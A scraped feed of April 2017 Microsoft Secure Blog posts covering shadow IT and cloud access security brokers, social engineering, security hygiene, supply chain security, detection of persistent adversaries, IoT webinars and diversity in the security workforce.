Microsoft Secure Blog In-depth discussion of security, cybersecurity and technology trends affecting trust in computing, as well as timely security news, trends, and practical security guidance 2017-04-24T16:00:37Z WordPress Microsoft Secure Blog Staff <![CDATA[4 steps to managing shadow IT]]> 2017-04-24T16:00:20Z 2017-04-24T16:00:37Z Read more »]]> Shadow IT is on the rise. More than 80 percent of employees report using apps that weren’t sanctioned by IT. Shadow IT includes any unapproved hardware or software, but SaaS is the primary cause in its rapid rise. Today, attempting to block it is an outdated, ineffective approach. Employees find ways around IT controls.

How can you empower your employees and still maintain visibility and protection? Here are four steps to help you manage SaaS apps and shadow IT.

Step 1: Find out what people are actually using

The first step is to get a detailed picture of how employees use the cloud. Which applications are they using? What data is uploaded and downloaded? Who are the top users? Is a particular app too risky? These insights provide information that can help you develop a strategy for cloud app use in your organization, as well as indicate whether an account has been compromised or a worker is taking unauthorized actions.

Step 2: Control data through granular policies

Once you have comprehensive visibility and understanding of the apps your organization uses, you can begin to monitor users’ activities and implement custom policies tailored to your organization’s security needs. Policies like restricting certain data types or alerts for unexpectedly high rates of an activity. You can take actions when there are violations against your policy. For instance, you can take a public link and make it private or create a user quarantine.

Step 3: Protect your data at the file level

Protecting data at the file level is especially important when data is accessed via unknown applications. Data loss prevention (DLP) policies can help ensure that employees don’t accidentally send sensitive information, such as personally identifiable information (PII) data, credit card numbers, and financial results outside of your corporate network. Today, there are solutions that help make that even easier.

Step 4: Use behavioral analytics to protect apps and data

Through machine learning and behavioral analytics, innovative threat detection technologies analyze how each user interacts with the SaaS applications and assess the risks through deep analysis. This helps you to identify anomalies that may indicate a data breach, such as simultaneous logons from two countries, the sudden download of terabytes of data, or multiple failed-logon attempts that may signify a brute force attack.

Where can you start?

Consider a Cloud Access Security Broker (CASB). These solutions are designed to help you achieve each of these steps in a simple, manageable way. They provide deeper visibility, comprehensive controls, and improved protection for the cloud applications your employees use—sanctioned or unsanctioned.

To learn why CASBs are becoming a necessity, read our new e-book. It outlines the common issues surrounding shadow IT and how a CASB can be a helpful tool in your enterprise security strategy.

Read Bring Shadow IT into the Light.


Microsoft Secure Blog Staff <![CDATA[Navigating cybersecurity in the New Age]]> 2017-04-22T16:22:21Z 2017-04-20T16:00:11Z Read more »]]>

In today’s rapidly evolving tech landscape, tools, gadgets, and platforms aren’t the only things advancing. Cyberattacks are becoming more powerful, wide-ranging, and harmful to organizations around the globe.

For any enterprise, cybersecurity is one of the most essential factors to business success. With new and emerging technology, leaders have to explore modern security needs via stronger, more intelligent solutions. Today, the modern security officers must:

  • Recognize the intricacies of the cyberspace and the cyberattacks that threaten it
  • Take advantage of machine learning and cloud platforms that enhance security
  • Gain insights to top trends and the future of the cybersecurity industry

Navigating today’s advanced cyber threats is a team effort. Organizations must learn new skills to protect themselves from cyber criminals and ensure infrastructure security. It takes a team of security experts, analysts, IT specialists, and risk assessors to restructure and refine cybersecurity.

On May 10th, Microsoft will live stream from the Security Summit, an invitation-only event for Chief Information Security Officers.  Attend the live, Virtual Security Summit to hear from leading security experts about best practices and solutions to keep your organization safe.

Don’t miss out on the opportunity to gain insights and learn how to protect your organization, detect, and respond to evolving cyberattacks.



Microsoft Secure Blog Staff <![CDATA[Is social engineering the biggest threat to your organization?]]> 2017-04-19T16:00:05Z 2017-04-19T16:00:24Z Read more »]]>

“Always remember: Amateurs hack systems. Professionals hack people.” –Bruce Schneier, CTO, Counterpane Internet Security, Inc.

All over the globe, social engineering is a dominant and growing threat to organizational security. Since January 2015, the number of social engineering victims identified by the FBI has increased 270%, costing businesses more than $2.3 billion.

Social engineering happens when a hacker uses manipulation, influence, or deception to get another person to release information or to perform some sort of action that benefits them. Essentially it just comes down to tricking people into breaking normal security procedures such as divulging a password.

Some common types of social engineering include:

  • Spear phishing – sending an email that appears to be from someone you trust, such as the CEO or corporate IT, requesting you to take an action that makes confidential information vulnerable.
  • Dumpster diving – rummaging through the trash to try to find confidential information like design documents with IP information, marketing plans, employee performance plans, or even organizational charts and phone lists.
  • 10 degrees of separation – appearing to have a shared connection you trust to make you feel more secure about discussing confidential information.

No matter how strong your technical security is, your organization’s people are often the most vulnerable link in the chain. But, with thorough, thoughtful, and regular education, they can also be your biggest asset in your fight against social engineering.

To learn how to implement strong security policies and build a security-aware culture to help protect your organization from social engineering risks, check out the Insider’s Guide to Social Engineering.

Microsoft Secure Blog Staff <![CDATA[Strategies to build your cybersecurity posture]]> 2017-04-18T16:00:58Z 2017-04-18T16:00:05Z Read more »]]> This post is authored by Michael Montoya, Executive Advisor, Enterprise Cybersecurity Group Asia Region.

“You clicked on an infected message…” In my prior life of managing an enterprise email environment, I started thousands of messages with that response to the victims of the infamous “love bug” email.

Looking back, this was a simple task compared to what we now face. Over the past 20 years, I have been on the front lines of the cybersecurity battlefield and fortunate to serve among some of the greatest professionals in our industry. During this time, I have witnessed the landscape shift from annoying hacker hobbyists to the advanced tactics of nation-states and well-funded organized cyber-criminals. The evolution of attacks is advancing at a record pace, and we are at full throttle inside a digital transformation, I don’t suspect any slowing of the pace of innovation coming from threat actors. In fact, trends indicate the opposite. We have the rise of cyber-terrorists, improving anti-forensics approaches, and non-malware approaches to attacks using in-memory, PowerShell-based, and WMI-based, to name a few.

“How do we stop these new threat actors?” is a common question I am asked. Unfortunately, the landscape is far too complex for a simple answer, and the more appropriate question is “How can we maximize the cost of an attack, for the attackers, so these threat actors leave us alone?” Similarly, if your home is more difficult to rob than your neighbor, you become a much less attractive target. Therefore, how can we increase our security posture in a world where the “identity” is the new network edge, all the while that identity works in coffee shops, airports and wifi hotspots around the globe? If your security posture relies on a human firewall to determine if a website or document is malicious, then you may be the most desirable house in the neighborhood for criminals.

In my years of leading operational teams and working among many of the greatest minds and enterprises, I have picked up keen insights that can improve security hygiene and increase the difficulty for any attacker. Before we dive in, state one truth loud and clear: “I am already breached”. This doesn’t necessarily translate to you being under a hostile attack, but the “assume breach” posture sets a very important tone, and unfortunately is likely to be your reality.

In Asia, we especially find enterprise security is commonly based on firewalls and legacy antivirus technologies. Given this reality, we find that an overwhelming, and I mean OVERWHELMING, majority of endpoints have evidence of malicious artifacts, i.e. they have already been breached.

According to a recent FireEye report, we find that a majority of attacks in Asia go undetected for as many as 520 days and 55% of the time are detected by external entities, not by our firewalls and antivirus technologies! Our numbers in Asia are improving, as well as globally, but not fast enough.

Now that we have assumed breach, how can we increase the cost of an attack? Here are 5 essentials that I have witnessed make a difference:

  1. Hygiene matters. Remember our parents always saying, “wash your hands”? Turns out they were right! Same is true in technology. Here are the minimum operating guidelines and the operational security equivalent to washing your hands:
    • Know your environment, especially your high value assets
    • Patch and install maintenance updates, prioritize your high value assets
    • Use complex passwords and encryption
    • Implement hardened administration and networks
    • Maintain logging
  2. Endpoint modernization. Many of us have modernized in a siloed and bolted-on approach. We have signature-based antivirus, some compliance encryption that drives up our helpdesk calls, and for a few, an endpoint detection and response technology. Each of these likely requires agents consuming critical resources and making our end users shout our names unkindly. The siloed approach requires our operations teams to stitch together and inundate an already overworked Security Info & Event Management system, aka SIEM. A modern endpoint fully integrates these functions and leverages virtualization and container technologies for isolation. The essentials of modern endpoint protection are to:
    • Perform the basics of anti-virus
    • Protect a user’s identity and contain lateral movement
    • Contain ransomware encryption
    • Leverage an intelligence platform to detect indicators of attack and compromise
    • Capture critical information to replay a breach in motion for advanced forensics
  3. Email application protection. There is a common saying in the USA that a “bad day fishing is better than a good day at work”. Allow me to iterate with “a bad day of phishing is a great day at work”. According to the Verizon Data Breach Investigations Report, 77% of modern attacks start with an email where it is too easy to find patient zero. I am surprised by enterprises that continue to implement hygiene services for anti-spam and anti-virus but don’t employ sandboxing or URL rewrite capabilities. Unless we want the human firewall to continue to be our last line of defense, email is a critical application to secure. Vital features are:
    • Anti-Spam/Anti-Virus
    • Sandbox detonation of attachments
    • URL re-write
  4. Intelligence platform. Today’s modern attacks are based on unknowns. This is why signature based technologies like antivirus are not succeeding. Intelligence must be based on a vast data set that can model indicators of attack and indicators of compromise quickly, then deliver these through technology. Enterprises that have developed this platform are at a distinct advantage to better hunt and detect the unknown behaviors that may result in an attack.
  5. Cybersecurity response and operations. People remain a critical component to success. There is no ignoring the shortage of professionals in security, and the demand continues to grow. According to Michael Brown, CEO of Symantec, to help defend us in this new space, “The demand for the (cybersecurity) workforce is expected to rise to 6 million (globally) by 2019.…” In a recent post, Ann Johnson, VP of the Enterprise Cybersecurity Group at Microsoft, championed an important best practice and case for change to help us address this shortage. Ensuring readiness, training and advanced operations are in place is critical. I am never surprised with the silence I often receive when I ask: “What is your first step in your cyberbreach response plan when you have detected a breach?” This needs to be a top priority of any CISO and CIO. Microsoft recently published a reference guide to address incident response. The response plan must include the technology team, executives, legal, marketing, risk and other relevant business stakeholders. Too many times these plans include only the technology teams. Next, enterprises must reduce the noise of alerts and ensure that their detection efficacy is feeding them the alerts that matter. The operations teams must move from reactive alert management to proactive hunting by sweeping endpoints and environments for malicious behavior and artifacts. The latest innovation in threats is non-malware attacks – where threat actors leverage system processes like WMI and Powershell to fly beneath the radar. Identifying these abnormalities with managed sweeps is a new critical operational process. Additionally, the operations teams must consistently run red team/blue team drills to refine their skills and identify potential weak points. Furthermore, adopt an Incident Command System (ICS) for Crisis Management and include executives, legal, marketing, finance, risk and other critical business functions in the incident response plans. Enterprises who have adopted these tactics are at a distinct advantage.

The positives of digital transformation far outweigh the risks and changing threat landscape. We must all assume we have been breached and transform our people, technology and processes to decrease the time it takes to detect a compromise and remediate. Making it more expensive for a threat actor is the biggest deterrence and the steps above significantly increase the hacker cost per comprise.

Michael Montoya is a 20-year veteran of the IT industry, currently serving an Executive Security Advisor in the Asia Pacific Region in the Enterprise Cybersecurity Group at Microsoft.  In this role, he regularly consults enterprise executives and governments in cybersecurity issues, and is a frequent featured speaker at IT conferences around the globe.

Microsoft Secure Blog Staff <![CDATA[How to protect yourself from cloud attacks]]> 2017-04-20T17:52:47Z 2017-04-17T19:00:29Z Read more »]]> As organizations are rapidly making the move to the cloud, safeguarding cloud resources against advanced cyber threats has become a top priority. Sophisticated attack vectors require a new approach to security. How can you leverage unique insights into a variety of threats to help defend against cloud attacks?

To learn more about how to keep your cloud secure—especially in this ever-present era of cybercrime—join our webinar, Take your cloud security to the next level: How to protect yourself from cloud attacks on April 18, 2017 at 10:00 AM PST. Register now.

This webinar will explore the threat landscape and the anatomy of common cloud attacks, how to detect, prevent and rapidly respond to attacks and leverage insights and analytics to defend yourself against threats. You will learn how Azure Security Center + Operations Management Suite can help you gain visibility and control, prevent and detect cyber-attacks and leverage analytics to help prevent future attacks.

There will be live Q&A with some of Microsoft’s foremost security experts. You don’t want to miss out—reserve your webinar seat today.

Explore more about our unique approach to security at Microsoft Secure.

Microsoft Secure Blog Staff <![CDATA[How Microsoft is securing the information and communication supply chain]]> 2017-04-17T16:00:14Z 2017-04-17T16:00:05Z Generally speaking, scrutiny of supply chain security for critical infrastructure is on the rise. Governments around the globe are increasingly paying attention to this issue, a fact which is reflected in recently developed and currently developing policies. That being said, the same principled and risk-based approach applies to managing risk in the supply chains of critical infrastructure as in those in supply chains more generally. The most effective requirements in this space result from governing bodies leveraging expertise by utilizing an open, collaborative, and iterative process that engages a range of stakeholders. One example of this approach in action is the National Institute of Standards and Technology’s (NIST) “Framework for Improving Critical Infrastructure Cybersecurity.” V 1.1 of this Framework, which is currently out for public comment, contains updates focused largely on supply chain security.

We recently heard from Microsoft leaders on the methods and policies for securing the information and communication technology (ICT) supply chain in our webinar “Supply chain security: A framework for managing risk”. In this blog, we will cover some of the fantastic questions our customers asked and how we responded.

How frequently does Microsoft conduct ‘red team’ pen testing of its products before vs. after fielding?
There are several pen test events that are carried out against our products and services annually, some of which are tied to competitions and educational events. Some of these are open to the hacking community, but many are closed events to ensure product and services integrity and availability.

Supply chain logistics today has to have close to real-time access to personal information to deliver products & services to meet customer demands. What changes do you see coming to protect that information?
Cloud based information protection and the broad application of access controls in a consistent and automated way is the best and most realistic way forward. The General Data Protection Regulation (GDPR), which takes effect on May 25, 2018, will require significant changes by organizations all over the world – including Microsoft and our customers. The GDPR represents a paradigm shift in global privacy requirements governing how you respect and protect personal data – no matter where it is sent, processed, or stored. Fundamentally, the GDPR is about protecting and enabling individuals’ rights to privacy, and its goals align with Microsoft’s enduring commitment to a cloud you can trust.

With fraud and piracy increasing in sophistication & capability how will the industry stay ahead of the curve?
Microsoft has a Digital Crimes Unit which is an international team of attorneys, investigators, data scientists, engineers, analysts, and business professionals working together to transform the fight against cybercrime. In the future, similar means will have the benefit of the kind of automated identification that machine learning can provide to do this at even greater scale.

If the customer requested it, do you have the ability to do external auditing on their behalf? Have you ever had that in a contract internally or with vendors (do you audit vendor security)?
We do not provide audit services to our customers for their consumption. We do perform onsite assessments for our critical suppliers.

Can the panel elaborate on the due diligence Microsoft does on their “fourth party” suppliers, or subcontractors of contractors?
For our suppliers, we ensure that the contracts are clear on our expectations and security requirements not only for them but the suppliers they use as well. Accountability is with the supplier Microsoft contracts with, and if they choose to use a subcontractor, that does not change.

How do I convince my organization to implement supply chain security?
Whether you are working for an organization that provides products or services to governments, enterprises, or consumers, the trust of the purchaser in your output is going to be critical to sales. A principled approach to supply chain risk management can help you establish and/or enhance that trust by demonstrating your commitment to the quality of what you are selling.

Any statistics on actual breaches relating to points of breach?
There are several good reports including Verizon’s annual Data Breach Investigations Report. This report for the most part identifies people as the weakest link with phishing and easy passwords as the first point of breach.

What are the primary components of Microsoft’s vetting process to ensure a reliable vendor? Is there a way that vendors can obtain these requirements beforehand? If so, does that increase or decrease Microsoft’s likelihood of incurring risk?
Vendor onboarding is subject to a mutually agreed upon set of directives for vetting and qualification. These are tailored to Microsoft needs and requirements, so they may vary for other organizations. It is a good practice to discuss these requirements with the vendor prior to onboarding.

If you would like to hear more about the methods and policies for securing the ICT supply chain, watch our webinar Supply Chain Security: A Framework for Managing Risk on-demand.

Learn more about Microsoft’s strategic approach to security at Microsoft Secure.


Microsoft Secure Blog Staff <![CDATA[The two-pronged approach to detecting persistent adversaries]]> 2017-04-13T16:00:11Z 2017-04-13T16:00:00Z Read more »]]> Advanced Persistent Threats use two primary methods of persistence: compromised endpoints and compromised credentials. It is critical that you use tools to detect both simultaneously. With only one or the other in place, you give adversaries more opportunities to remain on your network.

There are many attack vectors within these two main categories, including the use of zero-day attacks, exploiting vulnerabilities or weak defenses, using social engineering, creating hand-crafted malware via malicious implants, and harvesting legitimate credentials. Many cybersecurity tools have incomplete detection controls for these attacks and very little capability to detect harvested credential use. Microsoft has invested heavily in creating tools that empower organizations to address both problems.

Many initial attacks still arrive via e-mail attachment, so e-mail based protection tools are an important first line of defense. Office 365 Advanced Threat Protection helps you protect your mailboxes against new, sophisticated attacks in real time. By protecting against unsafe attachments and malicious links, it can keep e-mail borne attacks at bay.

But not all attacks are carried by e-mail. Windows Defender Advanced Threat Protection (Windows Defender ATP) enables enterprise customers to detect, investigate, and respond to advanced and zero day attacks on their endpoints. It uses built-in behavioral sensors, and machine learning and analytics to detect attacks that have made it past other defenses. Unparalleled threat optics, deep OS security, and big data expertise provide Security Operations (SecOps) correlated, actionable alerts. SecOps can investigate up to six months of historical data in a single timeline and use one-click response actions to effectively contain an incident and remediate infected endpoints. Windows Defender ATP has sensors to trace file, registry, network, processes, memory and kernel activities to help defenders understand what’s happening on the endpoint.

To complement these endpoint detection capabilities, Microsoft Advanced Threat Analytics offers critical insights into suspicious and anomalous user behavior, detecting lateral movement, credential theft activities and indicators of known techniques used by attackers. This is typically the blind spot for network defenders and digital forensics and incident response teams.  By collecting network traffic and events in an environment, and by using machine learning capabilities together with detection of known techniques, Advanced Threat Analytics transforms the noise into relevant Suspicious Activities,  simplifying the task for incident response teams. The earlier response teams can detect the adversary, the better they can prevent the attacker from gaining persistent access on your network.

It is equally important for incident response teams to detect abnormal activities on endpoints directly as well as compromised credentials.

Let’s walk through a practical example.

With the above diagram, an incident response team sees that Windows Defender ATP detected a user level exploit (assuming the application ran in user mode) and raised the first alert for this attack. When the attacker attempts to access the domain controller using a forged Privilege Attribute Certificate (PAC), the attack fails because you have patched your domain controllers for MS14-068. Advanced Threat Analytics detects the failed forged PAC attempt, which is a sign the adversary is active in your environment and attempting to escalate privileges.

Many responders would only inspect User-Workstation-B as Advanced Threat Analytics would identify that asset as the “source computer” of the attack. However, to fully understand the scope of this breach they will have to investigate all machines used by this user to find “patient zero” as well as other impacted endpoints.  By adhering to the “pivot wide” rules of digital forensics and incident response, and with the right tools in place, network defenders would quickly be able to identify the connection from User-Workstation-A to User-Workstation-B and follow that back to the initial compromise.

Without detecting both advanced attacks on the endpoint and compromised credentials, a response and recovery effort would be inadequate.  If you only clean up targeted endpoints but do not reset the affected credentials, the adversary could still have access to the environment.  If you only reset affected credentials, the adversary could still have access to the environment (and would simply re-harvest the new credentials on the systems they have access to)! In both cases, the eviction would fail, and even worse, the security team would report to the corporate board they had addressed the threat and the environment was now secure.

Combining the data and insights from Windows Defender ATP and Advanced Threat Analytics might indeed change your recovery strategy and drive a full investigation.

Using these two capabilities in concert can be game-changing for digital forensics and incident response teams: they can instantaneously search and explore 6 months of historical data across endpoints, visually investigate forensic evidence and deep analysis, quickly respond to contain the attack and prevent reoccurrence.

The power of Microsoft’s unique capabilities is amplified through the Microsoft Intelligent Security Graph.  This is the nexus of information on Indicators of Compromise, authentications, emails, etc.  Threats detected, blocked, and remediated from Windows Defender ATP, Advanced Threat Analytics, and other Microsoft products are added to the Intelligent Security Graph.  As a result, when persistent threats are captured and remediated by one solution, others can immediately start protecting against these threats.

As you evaluate your methods and tools for protecting against Advanced Persistent Threats, consider how you can move away from traditional detection tools that look at a single alert, axis, input or variable. Look for integrated tools, which can help the defender with increased speed and accuracy along with meta-event analysis.

Ask your questions and join the discussion with our team on the Microsoft Advanced Threat Analytics Tech Community site or the Windows Defender ATP team in the TechNet Forum. To learn more about Microsoft’s approach and vision for cybersecurity, visit the Microsoft Secure web site.

Microsoft Secure Blog Staff <![CDATA[Are my IoT deployments secure?]]> 2017-04-10T20:00:06Z 2017-04-10T20:00:10Z Read more »]]> According to IDC, there will be 28.1 billion connected Internet of Things (IoT) devices by 2020. Considering the numerous benefits of IoT—connected assets, predictive analytics, real-time intelligence—this isn’t all that surprising. But what about the inherent risks? IoT-based infrastructure is a wonderful intelligence tool, but, if not properly secured, can open the door for cyberattacks. A recent example of this is the massive hacking operation that brought down Twitter, Reddit, Spotify, and AirBnb in a single night. So, if you want to reap IoT benefits, how can you do it safely?

To learn more about how to keep your IoT deployment secure—especially in this ever-present era of cybercrime—join our webinar, Are my IoT deployments secure? on April 11, 2017 at 10:00 AM PST. Register now.

This webinar will explore the key vulnerabilities hackers exploit to breach your infrastructure, as well as arm you with tips for designing, developing, deploying, and operating an IoT infrastructure you can trust using Azure IoT. You’ll also have the opportunity to participate in a live Q&A with some of Microsoft’s foremost IoT and security experts.

You don’t want to miss out—reserve your webinar seat today.

Explore more about our unique approach to security at Microsoft Secure.

Microsoft Secure Blog Staff <![CDATA[Get both sides of the shadow IT story]]> 2017-04-10T16:00:22Z 2017-04-10T16:00:19Z Read more »]]> There are a number of reasons why employees use non-approved SaaS applications, and there are very good reasons IT wants to limit it. To reach a point where both sides are working together, it’s important to understand both perspectives.

Through the business lens: Employees look to drive results first

Organizations are in very competitive environments with demanding business objectives and far-reaching goals. Employees are under intense pressure to deliver results and often turn to non-approved apps to help them do their jobs quicker and more effectively.

Here are some of the common responses employees give when asked about shadow IT:

“I’m just more comfortable using a different app from the IT approved one. I don’t want to have to relearn a new program just to do the same thing”

“All of my external partners use a different app for file transfer. I can’t make everyone start using our solution, so I need to be able to use what they use.”

“The timelines on this project just don’t allow for the time it takes to get IT approval. It’s faster for me to just download and install the app myself.”

While they may have good intentions, many employees don’t fully understand the security risks associated with using non-approved applications, devices, or networks.

Businesses need to have visibility and control to ensure data compliance.

Through the IT lens: Shadow IT creates blind spots that can increase risk

Shadow IT creates a difficult challenge. Organizations expect IT to empower employees to do their jobs more effectively, while at the same time ensuring the security and compliance of sensitive data.

Without a detailed picture of the SaaS apps employees are using, IT cannot provide this security. On the other hand, blocking shadow IT inevitably leads to employees finding ways around the restrictions.

Some of the concerns IT teams encounter when faced with shadow IT are:

“I need to keep our organization’s data safe. If I don’t know what employees use or how they use it, those unknowns seriously jeopardize my ability to do so.”

“We have an approval process in order to reduce security compromises. Before we approve an app, we have to test and vet each app to ensure it meets not only our organizational requirements, but any industry regulatory or compliance requirements.”

While complete visibility might never be attainable, there are certainly steps IT can take to more effectively manage the blind spot shadow IT creates. One of those steps is to consider a Cloud Access Security Broker.

Cloud Access Security Brokers offer a compromise

A Cloud Access Security Broker (CASB) is a technology that helps you meet the needs of both IT and the business. It helps reduce the risk non-approved applications and services pose to your organization. Shadow IT is unlikely to be eradicated within organizations, so this is an important way to address the security gaps it creates.

CASB solutions help you to:

  • Get a detailed picture of the cloud apps and services your employees use
  • Control data in apps with granular-level policies
  • Protect your data and SaaS apps from advanced threats
  • Investigate users and their interactions with apps

The right CASB solution allows you to bring shadow IT into the light, giving employees the productivity tools they need, while helping maintain the security and compliance your company demands.

To better understand Shadow IT and how CASBs operate, check out our new e-book, “Bring Shadow IT into the Light.” 

Microsoft Secure Blog Staff <![CDATA[How to solve the diversity problem in security]]> 2017-03-30T16:00:04Z 2017-03-30T16:00:06Z Read more »]]> This post is authored by Ann Johnson, Vice President, Enterprise Cybersecurity Group.

I was in the midst of composing this blog on diversity in cybersecurity when a Fortune article on Women in Cybersecurity found its way to my LinkedIn feed. It was promoted to me by a man I know and respect. As I reflected on the content of this piece in the context of my post, a key detail leapt out at me. It was a male member of the cybersecurity industry advocating for women in this instance. So, what does it all mean?

I have enjoyed a technology career to date spanning 30 years. I have been fortunate to encounter amazing mentors along the way, female and male, many of whom I met very early in my career. My professional experiences, good and bad, successes and failures, have shaped who I am today. Through those experiences, I have become convinced we need more diversity in cybersecurity. Whilst there are no easy answers to solving this problem, understanding some of the root causes will help inform our decisions.

We need to hire and mentor more women and diverse talent in security not only because it is the right thing to do, but also because gaining the advantage in fighting cybercrime depends on it. If we do not diversify the cyber talent pool:

  • We are not likely to fill the estimated 1M+ global cybersecurity openings.
  • We will continue to engender group thinking among a few “experts” with similar backgrounds. Remember: diversity is not just about the color of our skin, gender, religious or ethnic background, it is also about being surrounded by people whose varied experiences contribute new ideas to problem solving.
  • We become weaker relative to our adversaries. Cybercriminals will continue to exploit the unconscious bias inherent in the industry by understanding and circumventing the homogeneity of our methods. If we are to win the cyberwars through the element of surprise, we need to make our strategy less predictable.

I firmly believe most bias is unconscious. Certainly, conscious bias exists, but in my view the majority are doing the best they can with the background and experiences that have shaped their lives. We tend to mentor and hire people we know and trust. If our professional sphere is limited to a certain segment of the population, then the hiring pool simply replicates the makeup of our network.

The cybersecurity industry has historically been predominantly male for a few reasons:

  • Women pursue STEM education at a lower ratio than men.
  • Many cybersecurity professionals come from traditional law enforcement or investigative backgrounds, and these industries are currently male majorities.
  • Women are reluctant to pursue careers in cyber because they don’t see themselves reflected in the employee pool, thereby creating a self-perpetuating cycle.

Given the serious implications the lack of diversity has for cybersecurity, how do we attract, recruit, mentor and retain a broader more inclusive workforce? The answer lies with a programmatic approach where we continuously measure effectiveness and adapt accordingly. The below steps, while not easy, and certainly not exhaustive, are imperative and urgent. The bad actors are well-funded and organized – innovating their methods, and growing their numbers – certain to become a permanent fixture of our digital future. Our ability to remain a step ahead is dependent on evolving our tools and talent through the following:

  • College recruiting. This is a must. Microsoft has a robust college hiring program and we make a conscious effort to include this talent on our security teams. We invest heavily in intern opportunities and new graduate hiring programs. We are not the only company to do so, but we need more firms to join us with a commitment to well executed and measured programs. We are also building a relationship with the Security Advisor Alliance which runs meaningful programs at both the high school and college levels, to provide cybersecurity education and industry recruiting.
  • Participation in our own rescue. I heard this expression a few years ago in a training class, and it stuck. The cybersecurity industry created this diversity problem, so we bear the onus to find a solution. We need to make training and retraining programs available to technical as well as non-technical talent, making cybersecurity a viable path. Including training options for those with non-technical degrees is key to addressing our well documented talent shortage in cyber. I know that this can work first hand. I was law school-bound with a degree in Communication and Political Science, when I decided that a technology career was more apt. By spending time on the go-to-market side and taking advantage of every vendor program available to further my technical training, I fulfilled my desired path.
  • Participation in organizations that promote diversity in cybersecurity. There are many who are tackling this initiative, but two that come to mind are: International Consortium of Minority Cybersecurity Professionals and #brainbabe.
  • Education on unconscious bias. I mentioned earlier that I believe most people are not aware of the language or behavior that implies bias. There is no intent to offend on their part. They are simply reflecting their life experience. Unfortunately, if you are a diverse person who works in these environments, you may not feel welcomed and often you choose to leave. You certainly won’t recommend these companies or work environments to your peer group – thus furthering the diversity gap. It is imperative that we educate about unconscious bias to address this issue.
  • Realization that all of us are smarter than one of us. Our CEO Satya Nadella says this on a regular basis to remind us that working through and with teams makes us all better. And working with team members that bring diverse perspectives and thoughts can only elevate team creativity and effectiveness.
  • Tailored mentorship. Recruitment and training programs alone will not change the cybersecurity employee landscape short-term. Diverse talent needs to hear from group members who have succeeded in cyber. Mentors that are trained and incented to grow group diversity are key to breaking stereotypes and misconceptions, as well as fostering optimism in those who would elect to pursue cybersecurity careers.

We will only solve the diversity problem as an industry. The industry’s conferences are all tackling diversity through meaningful dialogue which will hopefully lead to further investments. It is time for everyone to embrace a cybersecurity future where all who feel they can make a positive impact are welcomed, and our ability to recruit and retain these persons is free of the caveats and excuses of the past.